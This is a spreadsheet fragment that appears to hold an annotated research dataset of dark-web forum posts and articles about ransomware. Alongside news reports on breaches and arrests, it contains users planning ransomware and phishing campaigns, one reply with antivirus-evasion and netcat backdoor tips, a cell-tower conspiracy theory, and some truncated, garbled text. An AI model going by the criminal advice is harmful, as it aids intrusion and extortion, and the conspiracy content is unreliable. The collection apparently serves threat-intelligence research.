    <t>Post about Sodinokibi ransomware charging extra for bitcoin payments with the aim to discontinue payments altogether in the future in favour or monaro</t>
  </si>
  <si>
    <t>13/04/2020 20:35</t>
  </si>
  <si>
    <t>127b3548879f9f13a63f</t>
  </si>
  <si>
    <t>Sodinokibi Ransomware charges a premium for accepting bitcoin payments</t>
  </si>
  <si>
    <t>{'sodinokibi': 1, 'ransomware': 1}</t>
  </si>
  <si>
    <t>carding is dead, the money is all in crypto currencies and ransomware now.</t>
  </si>
  <si>
    <t>User stating ransomware is more profitable then carding</t>
  </si>
  <si>
    <t>/u/FoxxObj6</t>
  </si>
  <si>
    <t>ef7d14fd5e8d48f31366</t>
  </si>
  <si>
    <t>Someone making money carding?</t>
  </si>
  <si>
    <t>21 days 21:44:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the source code for the chastitylock ransomware that was used in attacks aimed at the users of the qiui cellmate adult toy is now publicly available. recently a family of ransomware was observed targeting the users of the bluetooth-controlled qiui cellmate chastity device.;;qiui cellmate made the headlines in october when the researchers at pen test partners published a report that provides details about security vulnerabilities affecting them. crooks were threatening the victims of locking indefinitely the device if they did not pay the ransom.;;security expert ax sharma reported the discovery of a github repository containing the ransomware code that could take over cellmate iot devices and control them via the smartphone app to receive a ransom amount in bitcoins. ransomware operators were demanding a 0.02 btc ransom amount (approx. $678) to the victims, the requests were sent to the victims via the cellmate mobile app.;;the availability of the ransomware code was first reported in a tweet by the user @vx-underground. ���security report has observed the exposed piece of code contains instructions to communicate with qiui���s api endpoints to enumerate user���s info, send messages to the victim���s app, add friends, request a ransom amount, and perform other tasks.��� wrote ax sharma on security report.;;the leaked code includes information to send commands to the devices through the qiui���s api endpoints. the malicious code also includes a function to enumerate a list of available qiui devices they could be targeted.;;at the time ax sharma reported the new, the api endpoints were returning an error message (���the specified key does not exist���). the expert warns of threat actors that could use the code to launch a cyberattack against cellmate devices.;;whether this source code is functional or not remains debatable, but the next iteration of a copycat attack targeting your cellmate device remains a possibility. ���howevmembercode, binding, and friend requests which line up with what was in pen test partners��� original disclosure of security vulnerabilities in qiui devices.��� concludes the post.;;���whether this source code is functional or not remains debatable, but the next iteration of a copycat attack targeting your cellmate device remains a possibility.��� the good news is that qiui addressed the vulnerabilities exploited by the malware, users have to install the la</t>
  </si>
  <si>
    <t>Source code for chastitylock ransomware is now publicly avaliable</t>
  </si>
  <si>
    <t>20/01/2021 07:15</t>
  </si>
  <si>
    <t>6f4a524df7d8a50f2a9e</t>
  </si>
  <si>
    <t>Source Code for Malware That Targets Qiui Cellmate Device Was Leaked Online</t>
  </si>
  <si>
    <t>i need to make money during this corona lockdown in my asia country and i have to stop working my day job;;i have idea to make people take a look at my email  by abusing corona thing;;i created a working ransomware with python and tested on a few pc. its not perfect for some reason  doesnt go through all directories in program files/  program files (x84) etc and stopped working mid way so i made it only encrypt everything in desktop/document/video/picture/downloads and thing like onedrive or google drive i think that's where most ppl keep importance things in one of these folder.;;since my country is poor i will take low amount of ransom  maybe 150 200usd worth of btc;;and then im thinking about  buying doc/xls exploit macro to cover my file and smtp for spam mailing and maybe if i can get crypto mining into my file;;thoughts ?</t>
  </si>
  <si>
    <t>Post from an asian country needing to make money and advertsing their ransomware</t>
  </si>
  <si>
    <t>/u/Ivaria</t>
  </si>
  <si>
    <t>dbe06c18a765c9641659</t>
  </si>
  <si>
    <t>Spreading malware through email and make money ?</t>
  </si>
  <si>
    <t>4 days 19:03:00</t>
  </si>
  <si>
    <t>hello everybody.;i have some ideas and would like some help if possible.;i'm about to "start" my life as a cybercriminal in fact and i have some paths i intend to follow and i would like your opinion.;;a brief explanation;i'm not a expert in the area of security and black hat but i'm not a complete beginner either. i plan on doing "small" things for a year or two until i get comfortable with the thug life and start planning really big things.;i plan to start with:;-ransomware in small businesses and selected people (i already bought a fresh ransomware);-cryptojacking?;-phishing cc credentials.;-provide cloned rfid tags and remote control of cloned gates for third parties to do their business.;;at first, i would only distribute ransomware on wifi that i have access to, a local attack via mitm.;maybe as the months go by, i'll buy a rat and start some other new path.;i would like your opinion on these paths and some suggestions, if possible.;thanks for the time.</t>
  </si>
  <si>
    <t>Post from someone wanting to get into cybercrime (stating they already have bought ransomware)</t>
  </si>
  <si>
    <t>/u/enfantsale</t>
  </si>
  <si>
    <t>29/03/2022 04:11</t>
  </si>
  <si>
    <t>ebac9b48e201e2ac3b9a</t>
  </si>
  <si>
    <t>Starting my career in the world of crime</t>
  </si>
  <si>
    <t>10 days 01:29:00</t>
  </si>
  <si>
    <t>29/03/2022 04:27</t>
  </si>
  <si>
    <t>2b73aabdc9ff09ca4193</t>
  </si>
  <si>
    <t>30 days 14:57:00</t>
  </si>
  <si>
    <t>you're going to distribute ransomware on wifi that you already have access to.. does this mean at your job? seems like a good way to get caught if so.;;keep us updated on how it goes!</t>
  </si>
  <si>
    <t>/u/cornballer</t>
  </si>
  <si>
    <t>29/03/2022 05:56</t>
  </si>
  <si>
    <t>0 days 01:45:00</t>
  </si>
  <si>
    <t>hello, im fairly new in this space, and to give a little bit of context i have a good foundational knowledge of networks, basic penetration testing (very basic), and a basic understanding of coding in c++ and python.;;the issue that i am having is where to focus my attention first. really this boils down to, how to i make my first dollar in this space? i know this question might be a bit played out, but none the less here i am.;;i was thinking something along the lines of infecting someone with ransomware through gaining access to someone's network and getting them to download a router "firmware update" or trying to phish someone for credentials, something basic along these line maybe, but i do not know and why i'm seeking some initial direction.;;if you were in my place starting out, what would you do, and where would you try to make a dollar?</t>
  </si>
  <si>
    <t>User asking for information on where to begin their cybercrime journey</t>
  </si>
  <si>
    <t>f4ca4bcab3af82ecd213</t>
  </si>
  <si>
    <t>Starting out and Where to Focus First</t>
  </si>
  <si>
    <t>0 days 08:32:00</t>
  </si>
  <si>
    <t>i am also in similar situation but i can say what i see most people say for people who are new is ransomware so i think you have right idea i do not know further than that so what ever method of obtaining access is best for you for doing that</t>
  </si>
  <si>
    <t>the illinois state police has announced a data breach incident affecting its firearm owners identification (foid) database, a portal where every firearms or ammunition holder who is a resident of illinois must register onto. according to the announcement, the portal went under attack by hackers who sought unauthorized access and compromised 2,000 gun owners from the state. in response to this, the police implemented additional access restrictions and tightened the checks to prevent any further abuse.;;each of the 2,000 foid card owners who have had their details exposed is now being personally notified by the state police. the data that these people had to submit in order to register on foid and get their card includes an id card or a driver���s license and a recent head and shoulder photograph. also, they need to cover a registration fee of $10, but payment details such as credit card information aren���t supposed to be stored in the foid database, so that must be excluded from the leak.;;similaruns.com��� and also the ���guntrader.uk��� security incidents, the problem here is that criminals will get to know who possesses firearms and where they live. this significantly increases the risk of break-ins, with the purpose of stealing weapons that can be used by criminals or sold in the black market. of course, access to guns in america is relatively open to everyone, but people still need to register their ownership to the authorities. finally, the breach compromises citizens��� privacy who may have preferred to keep their gun ownership a secret.;;the state of illinois has had several cybersecurity incidents lately, including a ransomware attack into the attorney general���s office in april 2021 and another one launched against the illinois department of employment security that took place in may 2020. finally, the illinois-based fermilab network was breached by the ���sakura samurai��� team earlier this year, and even if the infiltration wasn���t done witf proper security practices in a crucial public entity operating under the u.s. department of energy.;;one thing worth noting is that there are about 146,500 registered guns in illinois, so the percentage of the exposed individuals is roughly 1.4%. this is either success in real-time attack deflection systems or just a random fact attributed to limited server access from the hacker���s side.;;the foid card has been criticized by many people in illinois, not because it constitutes a privacy risk but because it delays gun ownership. state senator darren bailey has proposed eliminating the foid program as it causes a lot of frustration. maybe the recent security incident will give these critics another reason to shout against the foid.;;this is a typical example of why gun control should be a big no go and ownership of guns in general should be available without any registration what so ever, or at least shouldnt be stored electronically. it is absurd and should be unacceptable that law abiding tax paying ns living in illinois are paying $10 for their gun data to be stored insecurly only to have it stolen and out in the open afterwards.;;especially nowadays when about close to half of the us population is either brainwashed or misleaded in leaning towards a kind of socialist leftist fascism cultere that is very much anti gun and gun ownership in general. in the constitution it clearly states that citizens should have the right to bare arms. the original text of the second amendment of the constitution states "a well regulated militia, being necessary to the security of a free state, the right of the people to keep and bear arms shall not be infringed." as my favorite thomas jefferson quotation goes ���the laws that forbid the carrying of arms are laws of such a nature. they disarm only those who are neither inclined nor determined to commit crimes. such laws make things worse for the assaulted and better for the assailants; they serve rather to encourage than to prevent homicides, for an unarmed man may be attacked with greater confidence than an armed man.��� ��� thomas jefferson, commonplace book (quoting 18th century criminologist cesare beccaria), 1774-1776;;its clear as day that the founding fathers knew what they were doing when writing the constitution and wanted a country for the people by the people were people could be free to buy sell and use all kinds of goods of which also guns when necesarry or desired, and that gun registration of any kind let alone gun control in general should be off the table and not even up for debate. still alot of sell out politicians would love to see that day and are speaking about it openly as if iing that out of all the amendments our constitution holds the founding fathers made the right to bare arms the second (most important) amendment just bellow the first amendment which protects the freedom of speech, and press, the right of the people to peaceably assemble, and to petition the government for a redress of grievances.;;physical and digital privacy and protection are basic human rights and have to be respected by any person, institution and nation state, even looking at nature almost all animals have the capebility to defend themselves when they feel vulnerable or threatened. bees sting, dogs bark and bite, cats scratch and run, why should we be living like sheep or cattle being milked out of our data while taxed to death for our labour and call for help after its to late and the damage is already done and we've gotten either violated or as in this case stolen out of our precious data.;;as world citizens no matter were we live, as dn users and as cryto owners whe have to be aware of the fact that no matter were we are living or what laws they throw at us, self protection, personal privacy and choice over our own minds and bodys are fundemental basic human rights and necessities that are so sacret they go above all  man made laws, rules and rulers. how many pain, suffering and atrocities by the hands of governments and armed groups couldnt be prevented in the past if the victims were armed and had the means to protect them selves. besides, illogical or unrational laws that go against basic human rights and the laws of nature arent laws to be followed and anyone either enforcing or following is complicit and partaking in the act of basic rights violations. political atmospheres and governments in general change like the weather and its better to be safe than sorry so in my honnest opinion it would be wise to think about investing in some personal protection as part of your opsec.</t>
  </si>
  <si>
    <t>An article announcing a data breach in Illinois exposing fiearm owner idenitifcation</t>
  </si>
  <si>
    <t>/d/DeepWebMarkets</t>
  </si>
  <si>
    <t>c3ef1ad0d67b6acb85f7</t>
  </si>
  <si>
    <t>State Police In Illinois Had Firearm Owners Identification Database Breached</t>
  </si>
  <si>
    <t>0 days 14:28:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;rise of professional criminal gangs, malware-as-a-service and improved infrastructure for carrying out criminal activity are changing the dark web. here's what that means for enterprise security.;;lately, dark web actors have one more worry: getting caught by law enforcement. tracking dark web illegal activities has been a cat-and-mouse game for authorities, but in the end, they often catch their adversaries and seize the dodgy money.;;on the night of the 2020 presidential election, for example, us government officials managed to empty out a $1 billion bitcoin wallet recovering funds linked to silk road, seven years after the market���s closure. silk road was a popular underground marketplace dealing in illegal goods and services such as narcotics, hacking for hire, and contract killing.;;;cyber criminal group closure and exit scams;;events like these have compelled cyber criminals to plot new strategies, which sometimes involves closing shop and cashing out before theon the feds��� radar. in october 2020, the maze ransomware group, which has breached hundreds of companies including xerox, lg, and canon, shut itself down over a six-week period stating they had retired their activities.;;however, experts have suggested this is likely a fa��ade. ransomware operators often shut one operation down to join another rather than exit the business completely.;;���in recent years, the dark net has dramatically changed, quite organically, due to increased organised criminal organisations��� use of anonymous forums and marketplaces, the increased presence of young youtube inspired 'criminal wannabes,' and naturally, the subsequent increased presence of law enforcement and their attempts to infiltrate, de-anonymise, and take down such groups and hidden services,��� says mark turnage, ceo of darkowl, a dark web search engine.;;;dark web becoming a recruiting channel;;according to turnage, the dark web has evolved into an intermediary ground where cybercriminach new members for their group. they then move communications to private, encrypted channels such as telegram, jabber, and wickr.;;���malware developers and financial fraud [criminals] rely less on dark net marketplaces for distributing their exploits and instead levy black hat forums across the deep web and darknet to establish their brand, develop clout across the community, and recruit new members,��� says turnage. ���many criminal organisations use the dark net merely to vet potential affiliates, particularly in the ransomware-as-a-service industry, and their [co-conspirators].���;;turnage says that darkowl has seen more technically savvy criminals increase their use of alternative decentralised dark nets and meshnets such as lokinet and yggdrasil. he attributes this to the short lifespan of dark net marketplaces and services across tor and server seizures by globally coordinated law enforcement agencies.;;moving marketplaces from tor nodes to private messaging services may also coages, such as distributed denial of service (ddos) protections.;;these technical safeguards may lure dark web admins as underground marketplaces like empire have been forced to shut themselves down following ddos attacks by other cyber criminals in rather ironic extortion attempts. empire���s abrupt exit has also rendered its so-called ���escrow��� guarantee void, prompting some patrons to label the closure an ���exit scam.���;;by switching patrons over to legitimate end-to-end encrypted messaging services, cyber criminals leverage the reliable distributed infrastructure of these platforms while remaining discreet and avoiding the scrutiny of law enforcement.;;granted, messaging platforms like telegram may not be entirely immune from ddos attacks, protecting against such attacks then becomes the responsibility of platform owners rather than dark web ops.;;;leveraging underground chatter for intel gathering;;according to raveed laeb, product manager at kela, the dark web of today oods and services. although traditionally concentrated in forums, dark web communications and transactions have moved to different mediums including im platforms, automated shops, and closed communities. threat actors are sharing covert intelligence on compromised networks, stolen data, leaked databases and other monetisable cybercrime products through these mediums.;;���the market shifts are focused on automation and servitisation [subscription models], aimed at aiding the cybercrime business to grow at scale,��� says laeb. ���as can be witnessed by the exponential rise of ransomware attacks leveraging the underground financial ecosystem, the cyber criminal-to-cybercriminal markets allow actors to seamlessly create a supply chain that supports decentralised and effective cybercrime intrusions���giving attackers an inherent edge.���;;on the bright side, security professionals and threat analysts can tap into this intel to identify and patch system weaknesses before threat actors s can exploit these robust and dynamic ecosystems by gaining visibility into the inner workings of the underground ecosystem���allowing them to trace the same vulnerabilities, exposures, and compromises that would be leveraged by threat actors and remediate them before they get exploited,��� says laeb.;;this can be done by monitoring forums and darknet sites where threat actors are most likely to lurk, discuss upcoming threats, and put exploits up for sale.;;a hacker recently posted exploits for over 49,000 vulnerable fortinet vpns on a forum, for example, some of which belonged to prominent telecoms, banks and government organisations. this was followed by a second forum post in which another threat actor exposed plaintext credentials for all the vpn devices for any adversary to exploit.;;although the vulnerability in question is a two-year-old path-traversal bug, likely not on anyone���s radar anymore, thousands of corporate vpns present on the list remained vulnerable to this critical isssuch forums and monitoring for such intel can give heads up to security teams at organisations to do their due diligence in where adversaries may be headed next.;;;tracking illicit activity disguised under legitimate programs;;advanced persistent threat (apt) groups are now using the dark web to gather knowledge of their targets and then use legitimate network protocols and programs for covert data exfiltration purposes.;;���in the past, organisations tended to only be concerned about their own data appearing on the dark web, and even then, it would only ring alarm bells if significant data were located. however, many of the chinese and russian nation-state backed advanced persistent threat groups are now using the dark net to perform reconnaissance of potential targets, and then provide a cover for exfiltrating data,��� says vince warrington, ceo at dark intelligence.;;���since the start of 2020, the use of ssh by these apt groups has increased by over 200 per cent,�"our research indicated that apt groups are using ssh via port 22 to infiltrate organisations unnoticed and, once inside, are using poorly monitored and maintained systems - especially industrial control systems - to steal significant amounts of data.;;"several recent attacks are alleged to have stolen over one terabyte of data from individual businesses, a huge amount that organisations are failing to spot because they are unable to monitor effectively for dark net connections.";;this point has been substantiated by the discovery last month of the massive solarwinds supply chain attack attributed to the russian espionage group apt29, a.k.a. cozy bear. by exploiting trust within a legitimate program like solarwinds orion and its secure update channels (or protocols), sophisticated attackers managed to silently breach over 18,000 of the 300,000 solarwinds customers and remained undetected for months. their sinister activities conducted as a part of this attack could have involved covert surveillance and data exfiltration leaving no obvious trace.;;this is different from cases where threat actors make noise on public or dark web forums when leaking data dumps. so, monitoring the dark web alone for signs of data exfiltration isn���t enough.;;threat analysts and security researchers are therefore encouraged to reevaluate their monitoring strategies. rather than focusing solely on detecting anomalies within corporate networks, such as foreign ips and odd port numbers, or waiting forietary data to appear on the dark web, it is worth monitoring trustworthy programs and services, including their security updates, and your organisation���s software supply chains where threat actors could be hiding unno</t>
  </si>
  <si>
    <t>An article describing the state of the deep web</t>
  </si>
  <si>
    <t>3d644472a7c85069eb71</t>
  </si>
  <si>
    <t>State of The Dark Web: Insights From The Underground</t>
  </si>
  <si>
    <t>netcat almost always used for webshell backdoor;you can create a .exe file and mess with the hex signatures to make it unidentifiable by windows defender you can also embed your malware into a legit software for stealth.;you can look into some existing malware or ransomware as a reference to make it invisible in memory usage they are available on github.</t>
  </si>
  <si>
    <t>Post about using netcat with ransomware</t>
  </si>
  <si>
    <t>607da97e0eabe363f59b</t>
  </si>
  <si>
    <t>Stealthiest reverse shell for windows?</t>
  </si>
  <si>
    <t>0 days 00:58:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the hse said that the data included minutes of meetings and correspondence with patients in addition to sensitive patient information.;;;source:;irish central;;the health service executive has confirmed that some sensitive patient data stolen during the cyberattack on its systems three weeks ago has been leaked on the dark web. the data contained corporate documents and private information related to roughly 520 patients.  the hse told the financial times that the data included minutes of meetings and correspondence with patients in addition to sensitive information.;;it has now begun notifying the patients involved in the leak. the financial times first reported details of the leak almost two weeks ago, stating that 27 files containing the medical records of 12 individuals had been leaked on the dark web.;;however, the hse has now confirmed that a significantly higher number of patients were affected by the data leak. it also confirmed for the first time that the leaked data came from hse servers. "this data was the initial small tranche of data that was previously reported on, and we are not aware of any further attempted publication of our data," a hse spokesperson said.;;"we apologize for the inconvenience caused to our patients and service users. the hse is working with an garda s��och��na on this criminal invest" the cybercriminal gang behind the ransomware attack on the hse servers has threatened to publish more than 700 gigabytes of stolen data on the dark web if the hse does not pay a ���16.4 million ransom.;;the irish government has repeatedly stated that it will pay no ransom. hse ceo paul reid said that the cyberattack will cost the health service at least ���100 million. reid said that this figure was at the lower end of estimates and said that the hse would have to pay significant fees to upgrade to microsoft 365 and restore its networks. reid additionally said that disruption caused to patients as a result of the attack would result in significant costs.;;the cyberattack, which took place on may 13, has resulted in the cancelation of roughly 7,000 appointments per day over the last three weeks, while the h"a long way" from restoring its systems.</t>
  </si>
  <si>
    <t>Article about HSE being breached</t>
  </si>
  <si>
    <t>4de99eae107557f66895</t>
  </si>
  <si>
    <t>Stolen Sensitive Data of 520 Patients Published on Dark Web After HSE Cyberattack</t>
  </si>
  <si>
    <t>how am i supposed to pay the ransom if it encrypted it's own payment note?</t>
  </si>
  <si>
    <t>User asking how to pay a ransom if they have encrypted their own payment note</t>
  </si>
  <si>
    <t>e5fba6ddb83e8b249721</t>
  </si>
  <si>
    <t>Stupid ransomware encrypted it's own payment address</t>
  </si>
  <si>
    <t>1 days 11:24:00</t>
  </si>
  <si>
    <t>;;stupid ransomware encrypted it's own payment address;;by;/u/[deleted];���;5 months ago;in;/d/malware;;1 points;���;</t>
  </si>
  <si>
    <t>e52408dc3b9c9118eae3</t>
  </si>
  <si>
    <t>really stupid ransomware then, reverse it and figure how to decrypt files yourself.</t>
  </si>
  <si>
    <t>0 days 11:14:00</t>
  </si>
  <si>
    <t>all that fucking about with ransomware got the feds sniffing around now.</t>
  </si>
  <si>
    <t>User stating that the increase in ransomware has alerted law enforcement</t>
  </si>
  <si>
    <t>/u/dreadonthehead</t>
  </si>
  <si>
    <t>13/06/2021 11:12</t>
  </si>
  <si>
    <t>1725f4877b5c7305563e</t>
  </si>
  <si>
    <t>TOR Hosting - How do you you do it Empire/WHM/Dread/Recon?</t>
  </si>
  <si>
    <t>0 days 04:09:00</t>
  </si>
  <si>
    <t>72 days 19:09:00</t>
  </si>
  <si>
    <t>read here:;https://www.latimes.com/opinion/story/2022-02-24/electromagnetic-weapons-havana-syndrome;https://www.wired.com/story/my-father-says-hes-a-targeted-individual-maybe-we-all-are/;;one view of how it is being done:;;companies get hacked all the time and extorted with ransomware. the computers that control 3g/4g/5g network don't have data that can be held for ransom, but that doesn't mean they can't also be used for extortion after being hacked. what if they are modified to believe there are 50 phones in the space where a person's head is? the combined power output of the phone tower trying to connect to the non-existent phones would damage someone's tissues. now the criminals can give that someone a notice that this won't stop unless they pay up or obey their orders.;;if not even the giants of silicon valley are immune to hacking, there is no reason to expect telecom providers are either, even if public opinion thinks these for profit companies care more about public safety than money.</t>
  </si>
  <si>
    <t>Post about havana syndrome and the long term effects</t>
  </si>
  <si>
    <t>/u/nsopegasusyou</t>
  </si>
  <si>
    <t>29/03/2022 09:07</t>
  </si>
  <si>
    <t>a8ebc567622ed64c74a8</t>
  </si>
  <si>
    <t>Taking victims of ���Havana syndrome��� seriously. Are electromagnetic weapo</t>
  </si>
  <si>
    <t>162 days 01:52:00</t>
  </si>
  <si>
    <t>looking for someone who can send me guides/show me how to use malware including rats, ransomware etc. i will show you how to get 20+ infections in a couple hours of business/rich people. i have looked long and hard and studied cyber security but there aren't many guides on how to set up malware</t>
  </si>
  <si>
    <t>User asking for ransomware education in return for targets</t>
  </si>
  <si>
    <t>/u/SOMEBOREDGUY21</t>
  </si>
  <si>
    <t>b1e334f26f6f7c8fff1c</t>
  </si>
  <si>
    <t>Team up</t>
  </si>
  <si>
    <t>25 days 13:50:00</t>
  </si>
  <si>
    <t>there are many but they are obsolete, problem with guides is nobody will sell a working methods for some bucks when they can exploit for themselves.;work on your own strategy, ask question when you're can find the answer here.</t>
  </si>
  <si>
    <t>/u/BabyLordaSosa</t>
  </si>
  <si>
    <t>0 days 12:29:00</t>
  </si>
  <si>
    <t>hahacktown does not have a rat or ransom course per say but they can teach you how to protect yourself and give you a idea of what you do. it's 250 bucks but well worth it. also look into qubes.</t>
  </si>
  <si>
    <t>texas state officials said this week that a well executed ransomware attack hit 22 local texas government branches but none of the impacted municipalities paid the ransom demands. the texas department of information resources (dir) has said that after 3 weeks more than half of the impacted entities are now back to operations as usual. it was on friday, august 16, when hackers compromised their it networks and deployed the sodinokibi (revil) ransomware. the mayor of one of the impacted texas cities (keene, texas) said the hackers obtained access to the city's network using software that is normally used by an it company to remotely manage keene's infrastructure which is the same software that was also used by the other municipalities. between all 22 municipalities the total ransom demand was around $2.5 million usd.;texas officials did have a plan in place for an incident like this that was similar to how louisiana deployed emergency cyber-teams to deal with a rash of ransomware infections at three local school districts. experts from more than ten government agencies and private sector partners were called in to help the cities recover. the municipalities were able to avoid paying the ransom by restoring the systems from backups when possible and entirely rebuilding the other effected networks from scratch. this subsequently avoided another media and pr disaster. recently taxpayers have been turning against cities that don't invest the necessary money to safeguard their it networks and then submit to ransom demands in situations like this. some prime examples of this can be seen with riviera city, florida; lake city, florida; and jackson county, georgia. ibm did some investigating on their own and found that 60% of respondents (us taxpayers) were against cities using state funds to pay ransom demands in ransomware attacks and that 90% of respondents said they would be in favor of the us government increasing federal funding to improve cities' cybersecurity.;unfortunately more and more cities are choosing to pay ransoms recently which is making these criminals more bold with their attacks. that along with the fact that insurance companies are likely going to advise effected municpalities to pay ransom demands instead of covering the huge costs of rebuilding it networks from scratch have convinces these criminals to begin demanding even larger sums of money. this can be seen with another recent ransomware attack where an astonishin $5.3 million usd was demanded from a town in massachusetts. the officials from that city in massachusetts turned down the ransom request and decided to restore thier systems from backups, though the town did say it was initially willing to pay $400,000 to the attackers.</t>
  </si>
  <si>
    <t>Post about how ransomware attacks have hit the texas goverment</t>
  </si>
  <si>
    <t>/u/DixieRect</t>
  </si>
  <si>
    <t>116468e73e5d81bcebec</t>
  </si>
  <si>
    <t>Texas municipalities refused to pay a total of 2.5 million to Ransomeware attackers.</t>
  </si>
  <si>
    <t>0 days 06:52:00</t>
  </si>
  <si>
    <t>{'sodinokibi': 1, 'ransomware': 4}</t>
  </si>
  <si>
    <t>i guess i understand that they don't want to pay a ransom, but it seems to cost more to not pay.</t>
  </si>
  <si>
    <t>/u/BBQB</t>
  </si>
  <si>
    <t>but if you submit and pay out the ransom they'll continue to try to do it to other organizations since they're having success with it. who's to say they won't find a way back in to that same system that has already paid their ransom and lock it again? who's to say they'll even give you the key to unlock the systems after you do pay? i view this as a similar situation that ddos douchebag we all just spent months dealing with that was demanding payments to stop the attacks.</t>
  </si>
  <si>
    <t>the u.s. justice department on monday accused a 55-year-old cardiologist from venezuela of being the mastermind behind thanos ransomware, charging him with the use and sale of the malicious tool and entering into profit sharing arrangements.;;moises luis zagala gonzalez, also known by the monikers nosophoros, aesculapius, and nebuchadnezzar, is alleged to have both developed and marketed the ransomware to other cybercriminals to facilitate the intrusions and get a share of the bitcoin payment.;;if convicted, zagala faces up to five years' imprisonment for attempted computer intrusion, and five years' imprisonment for conspiracy to commit computer intrusions.;;"the multi-tasking doctor treated patients, created and named his cyber tool after death, profited from a global ransomware ecosystem in which he sold the tools for conducting ransomware attacks, trained the attackers about how to extort victims, and then boasted about successful attacks, including by malicious actors associated with the government of iran," u.s. attorney breon peace said.;;the ransomware-as-a-service (raas) scheme involved encrypting files belonging to companies, non-profit entities, and other institutions, and then demanding a ransom in exchange for the decryption key;;at its core, thanos is a private ransomware builder that allows its purchasers (aka affiliates) to create their own custom ransomware software, which they could then use or lease it to other actors, effectively widening the scope of the attacks.;;an analysis by recorded future in june 2020 revealed that the builder comes with 43 different configuration options, calling it the first ransomware family to leverage the riplace technique to bypass ransomware protection features built into windows 10.;;some of the options available include the ability to modify the ransom notes, specify the list of file types to be exfiltrated prior to encryption, and settings to evade detection and self-delete the ransomware after execution.;;zagala is believed to have advertised the software on darknet cybercrime forums for $500 a month with "basic options" or $800 with "full options," while also recruiting affiliates for the raas program.;;"on or about may 1, 2020, a confidential human source of the fbi (chs-1) discussed joining zagala's 'affiliate program,'" the doj said. "zagala responded: 'not for now. don't have spots," before proceeding to license the software to chs-1 and helping the informant with tutorials on how to use the software and set up an affiliate crew.;;zagala, who received favorable reviews for his ransomware tools, was ultimately traced on may 3, 2022, after identifying a paypal account belonging to his relative who resides in the u.s. state of florida and which was used to obtain the illicit proceeds.;;;;moral;: don't use relative paypal, lol</t>
  </si>
  <si>
    <t>Post about a 55 year old cardiologist being arrested and charged in the US for being the mastermind behind the thanos ransomware</t>
  </si>
  <si>
    <t>22/05/2022 02:19</t>
  </si>
  <si>
    <t>f4e9edc0b3028c238ad3</t>
  </si>
  <si>
    <t>Thanos Ransomware is in USA wallet now</t>
  </si>
  <si>
    <t>3 days 22:07:00</t>
  </si>
  <si>
    <t>;the dark web has been increasingly used during the past few years by government agencies, intelligence bureaus, and even military forces in offensive cyberwarfare, as well as in cybersecurity defense operations. however, given the fact that the dark web is also notably used by cybercriminals to conduct a myriad of illegal activities, it is pivotal for law enforcement agencies to develop accurate means for investigating activities on these darker parts of the world wide web. on the other hand, law enforcement online investigative actions might be recognized by other nations and be otherwise misinterpreted as being hostile.;;;the cybersecurity dilemma emerges from the principle of international relationships, the spiral model or security dilemma, whereas two countries, aiming at boosting their security and avoiding conflicts, may end up escalating inter-nation conflicts via misinterpretation of the intents underlying each other���s online actions namely due to mistrust. on the world wide web, it is consiy difficult to verify intentions, so misinterpretation of the online actions of others can lead to escalation of online conflicts. a recently published article aims at illustrating the potential of escalating cyberwarfare conflicts via means of the game theory and how this is emerging as a serious challenge to forensic investigations conducted by law enforcement agencies on the dark web.;;;degree of separation of security agents from the state;;;during most of the security dilemmas staking place today, uncertainty arises from two main factors ��� state intents and the sophistication of the deployed technological resources. what remains unclear here is uncertainty regarding the security agent���s degree of separation from the state. moreover, if uncertainty also exists regarding the agent and their level of dedication towards the nation���s plan, this could alter the state���s plans when escalation is considered. obviously, states experiencing the aftermath of offensive intrusions for dwon���t escalate conflicts because they cannot guarantee that individuals and organizations would serve as the primary culprit with the state simply serving as the beneficiary.;;;a revisionist state may plan and launch such attacks and then deny having done so. for example, even though attacks like the wannacry ransomware seem to be planned and launched by individuals for financial purposes, the associated disruptions that hit hospital systems may suggest state sponsored attacks.;;;more importantly, it should be emphasized that individuals matter in cybersecurity. they matter differently than they might do in international corporations, advocacy networks, or in any other professional community. individuals matter in cybersecurity dilemmas because they can reshape the framework of the ecosystem itself, and they actually do so, daily. one hacker continuously works to find one vulnerability within a large and simultaneously interconnected network. another hacker can be motivated by lust, love, revenge, or y. all of this considerably influences the overlapping digital sectors of the world. cyber defense and attack activities are not always conducted within closed state-owned systems. most cyber attacks are executed outside the intelligence and military domains of control. that���s why much of the panic in cybersecurity defense is centered around promoting the security of critical water and energy infrastructures.;;;sophistication led to the production of stuxnet, the computer worm that was transformed into a mighty weapon that shut down the iranian centrifuges. in october 2016, the largest (ddos) attack in history was launched. the mirai ddos attack which targeted dyn, an online based traffic routing corporation, disrupted services for thousands of us and european companies for days. the code for the mirai botnet compromised tens of thousands of iot devices such as leds, dvd players, game consoles, and digital cameras. many internet security professionals managed to link the the source code of mirai back urf war that involved users who play the mmorpg game minecraft. some even suggested that a rutgers university student, paras jha, who owns a company called protraf that protects websites that profit from minecraft players, may have developed the worm. the mirai botnet���s code was no sophisticated hack by any means. it simply exploited the security vulnerabilities known to exist in the iot ecosystem.;;;security dilemmas and conflict spirals;;;the security dilemma may result in anarchy when a state���s intentions to acquire defensive military tools yields offensive threats to other states, thus increasing the risk of potential conflict spirals. technically speaking, more power is usually associated with less security. when offensive actions have an advantage over defensive measures and attacks cannot be distinguished from defensive strategies, the security dilemma turns into a ���doubly dangerous��� threat. the tactical advantage enjoyed by the attacker across the dark web, along with tques utilized in harvesting of intelligence information, as well as planned sabotaje of basic civilian infrastructure, results in a ���cybersecurity dilemma���.;;;the overlap currently existing between the basic concepts of the security dilemma and digital intelligence activities, namely when cyber resources and techniques are considered, requires meticulous analysis of the links between intelligence approaches and diplomatic measures. intelligence operations, including counter-intelligence measures, take place during peacetime as well as during times of war and may be quite active even in the absence of overt military moves. utilizing the dark web in intelligence has the potential to maximize the potency of the state���s cyberwarfare capabilities (e.g. by improving obfuscation during surveillance, targeting, and combat assessment), and it can facilitate discovery of vulnerabilities in the military capabilities of target states.;;;the three pillars of the cybersecurity dilemmas;;;1- sophistiire massive efforts, time, and resources;;;successful hacking into complex, remote, arbitrary, sensitive target networks relies on advanced planning, organizational skills, and may last for years. this fact runs counter to the widespread belief on cyberwarfare that it involves inexpensive, high speed forms of easy-to-deploy hacking attacks. disruptive attacks in cyberspace that aim at inflicting politically pronounced damage require extensive supportive intelligence and planning and, often implement the same methods to compromise the target.;;2-;to defend, you must attack!;;;effective defensive cyber operations require engaging in offensive activities in order to identify offensive intrusions aimed against a given 